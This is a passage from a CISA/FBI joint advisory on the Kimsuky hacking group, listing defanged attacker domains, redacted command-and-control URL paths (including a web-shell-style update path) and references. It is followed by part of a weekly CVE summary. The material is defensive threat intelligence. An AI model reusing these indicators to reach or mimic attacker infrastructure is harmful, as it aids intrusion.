<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>preview.manage.org-view[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>intranet.ohchr.account-protect[.]work</code></p>
</td>
</tr>
</tbody>
</table>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Table 2: Redacted domains used by Kimsuky</em></p>

<table style=”border: medium none; width: 737px; border-collapse: collapse; margin-left: auto; margin-right: auto;”>
<tbody>
<tr>
<td style=”padding: 0in 7px; border: 1px solid black; border-image: none; width: 200px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?van=101</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentColor; padding: 0in 7px; width: 230px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?v%20an=101</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentcolor; padding: 0in 7px; width: 261px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?van=102</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 200px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/up[.]php?id=NQDPDE</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 230px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/test/Update[.]php?wShell=201</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 261px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code><font color=”#000000″><font size=”3″> </font></font></code></p>
</td>
</tr>
</tbody>
</table>
<h3>Contact Information</h3><p style=”margin-top: 8px; margin-bottom: 8px;”>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”https://www.fbi.gov/contact-us/field-offices”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href=”https://us-cert.cisa.gov mailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govmailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a>.</p>

<div class=”special_container text-align-center”><strong><em>DISCLAIMER</em></strong></div>

<div class=”special_container”>
<p><em>This information is provided “as is” for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p>

<p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p>
</div>

<p><o:p></o:p></p>
<h3>References</h3>
<ul> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[1] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[2] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[3] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[4] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[5] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>[6] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[7] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>[8] CrowdStrike: 2020 Global Threat Report</a></li> <li><a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>[9] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure</a></li> <li><a href=”https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html”>[10] PwC: Tracking ‘Kimsuky’, the North Korea-based cyber espionage group: Part 2</a></li> <li><a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>[11] CrowdStrike: 2020 Global Threat Report</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[12] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[13] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”route:<nolink>”>[14] Private Sector Partner</a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[15] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>[16] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure</a></li> <li><a href=”https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/”>[17] cyberscoop: North Korea could accelerate commercial espionage to meet Kim’s economic deadline </a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[18] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[19] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[20] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>[21] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>[22] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[23] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[24] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/”>[25] Palo Alto Networks Unit 42: BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat </a></li> <li><a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>[26] McAfee: What is mshta, how can it be used and how to protect against it</a></li> <li><a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>[27] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[28] Netscout: Stolen Pencil Campaign Targets Academia</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[29] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>[30] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[31] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[32] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”route:<nolink>”>[33] Private Sector Partner</a></li> <li><a href=”route:<nolink>”>[34] Private Sector Partner</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[35] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>[36] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs</a></li> <li><a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>[37] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[38] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[39] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[40] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[41] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[42] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[43] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>[44] McAfee: What is mshta, how can it be used and how to protect against it</a></li> <li><a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>[45] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[46] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[47] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/”>[48] Detecting credential theft through memory access modelling with Microsoft Defender ATP</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[49] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>[50] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims</a></li> <li><a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>[51] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[52] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[53] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”route:<nolink>”>[54] Private Sector Partner</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[55] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[56] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href=”route:<nolink>”>[57] Private Sector Partner</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[58] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href=”route:<nolink>”>[59] Private Sector Partner</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[60] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 27, 2020: Initial Version</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy & Use</a> policy.</p>

</div>

alerts

Vulnerability Summary for the Week of October 19, 2020

Post author By admin
Post date October 26, 2020

Original release date: October 26, 2020

The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

High Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
acronis — cyber_backup	Acronis Cyber Backup 12.5 and Cyber Protect 15 include an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory within C:jenkins_agent. Acronis Cyber Backup and Cyber Protect contain a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges.	2020-10-21	7.2	CVE-2020-10138 MISC
acronis — true_image	Acronis True Image 2021 includes an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory within C:jenkins_agent. Acronis True Image contains a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges.	2020-10-21	7.2	CVE-2020-10139 MISC
adobe — animate	Adobe Animate version 20.5 (and earlier) is affected by an out-of-bounds read vulnerability, which could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate.	2020-10-21	9.3	CVE-2020-9750 MISC
adobe — animate	Adobe Animate version 20.5 (and earlier) is affected by an out-of-bounds read vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate.	2020-10-21	9.3	CVE-2020-9749 MISC
adobe — animate	Adobe Animate version 20.5 (and earlier) is affected by a double free vulnerability when parsing a crafted .fla file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-21	9.3	CVE-2020-9747 MISC
apple — icloud	A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.	2020-10-16	7.5	CVE-2020-9895 MISC MISC MISC MISC MISC MISC MISC
apple — ipad_os	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.0 and iPadOS 14.0. An application may be able to cause unexpected system termination or write kernel memory.	2020-10-16	9.3	CVE-2020-9958 MISC
apple — ipad_os	A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges.	2020-10-16	9.3	CVE-2020-9923 MISC MISC
apple — ipad_os	A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An application may be able to execute arbitrary code with kernel privileges.	2020-10-16	9.3	CVE-2020-9907 MISC MISC
apple — ipad_os	An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.	2020-10-16	10	CVE-2020-9918 MISC MISC MISC MISC
apple — mac_os_x	A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.	2020-10-16	10	CVE-2020-9864 MISC
apple — mac_os_x	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges.	2020-10-16	9.3	CVE-2020-9799 MISC
apple — xcode	This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network.	2020-10-16	9.3	CVE-2020-9992 MISC MISC
cisco — firepower_threat_defense	A vulnerability in the SSL/TLS inspection of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series firewalls could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper input validation for certain fields of specific SSL/TLS messages. An attacker could exploit this vulnerability by sending a malformed SSL/TLS message through an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. No manual intervention is needed to recover the device after it has reloaded.	2020-10-21	7.1	CVE-2020-3562 CISCO
cisco — firepower_threat_defense	A vulnerability in the ICMP ingress packet processing of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 4110 appliances could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to incomplete input validation upon receiving ICMP packets. An attacker could exploit this vulnerability by sending a high number of crafted ICMP or ICMPv6 packets to an affected device. A successful exploit could allow the attacker to cause a memory exhaustion condition that may result in an unexpected reload. No manual intervention is needed to recover the device after the reload.	2020-10-21	7.8	CVE-2020-3571 CISCO
cisco — firepower_threat_defense	A vulnerability in the packet processing functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to inefficient memory management. An attacker could exploit this vulnerability by sending a large number of TCP packets to a specific port on an affected device. A successful exploit could allow the attacker to exhaust system memory, which could cause the device to reload unexpectedly. No manual intervention is needed to recover the device after it has reloaded.	2020-10-21	7.8	CVE-2020-3563 CISCO
hp — intelligent_management_center	A selectusergroup expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7168 MISC
hp — intelligent_management_center	A reportpage index expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7187 MISC
hp — intelligent_management_center	A powershellconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7186 MISC
hp — intelligent_management_center	A faultdevparasset expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7143 MISC
hp — intelligent_management_center	A viewtaskresultdetailfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7176 MISC
hp — intelligent_management_center	A ifviewselectpage expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7154 MISC
hp — intelligent_management_center	A selviewnavcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7157 MISC
hp — intelligent_management_center	A iccselectdeviceseries expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7160 MISC
hp — intelligent_management_center	A reporttaskselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7161 MISC
hp — intelligent_management_center	A operatorgroupselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7162 MISC
hp — intelligent_management_center	A navigationto expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7163 MISC
hp — intelligent_management_center	A operationselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7164 MISC
hp — intelligent_management_center	A iccselectcommand expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7165 MISC
hp — intelligent_management_center	A quicktemplateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7167 MISC
hp — intelligent_management_center	A faultinfo_content expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7156 MISC
hp — intelligent_management_center	A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7169 MISC
hp — intelligent_management_center	A select expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7170 MISC
hp — intelligent_management_center	A guidatadetail expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7171 MISC
hp — intelligent_management_center	A templateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7172 MISC
hp — intelligent_management_center	A devgroupselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7146 MISC
hp — intelligent_management_center	A perfselecttask expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7158 MISC
hp — intelligent_management_center	A chooseperfview expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7145 MISC
hp — intelligent_management_center	A faultflasheventselectfact expression language injectionremote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7189 MISC
hp — intelligent_management_center	A select expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7155 MISC
hp — intelligent_management_center	A iccselectdevtype expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7153 MISC
hp — intelligent_management_center	A faultparasset expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7152 MISC
hp — intelligent_management_center	A faulttrapgroupselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7151 MISC
hp — intelligent_management_center	A faultstatchoosefaulttype expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7150 MISC
hp — intelligent_management_center	A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7149 MISC
hp — intelligent_management_center	A customtemplateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7159 MISC
hp — intelligent_management_center	A userselectpagingcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7188 MISC
hp — intelligent_management_center	A operatorgrouptreeselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7166 MISC
hp — intelligent_management_center	A deviceselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7190 MISC
hp — intelligent_management_center	A addvsiinterfaceinfo expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-24652 MISC
hp — intelligent_management_center	A deployselectbootrom expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7147 MISC
hp — intelligent_management_center	A iccselectdymicparam expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7175 MISC
hp — intelligent_management_center	A smsrulesdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7181 MISC
hp — intelligent_management_center	A ictexpertdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7180 MISC
hp — intelligent_management_center	A thirdpartyperfselecttask expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7179 MISC
hp — intelligent_management_center	A mediaforaction expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7178 MISC
hp — intelligent_management_center	A wmiconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7177 MISC
hp — intelligent_management_center	A deployselectsoftware expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7148 MISC
hp — intelligent_management_center	A soapconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7174 MISC
hp — intelligent_management_center	A forwardredirect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7183 MISC
hp — intelligent_management_center	A actionselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7173 MISC
hp — intelligent_management_center	A remote operatoronlinelist_content privilege escalation vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-24630 MISC
hp — intelligent_management_center	A devsoftsel expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7191 MISC
hp — intelligent_management_center	A syslogtempletselectwin expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-24651 MISC
hp — intelligent_management_center	A legend expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-24650 MISC
hp — intelligent_management_center	A adddevicetoview expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7141 MISC
hp — intelligent_management_center	A accessmgrservlet classname deserialization of untrusted data remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-24648 MISC
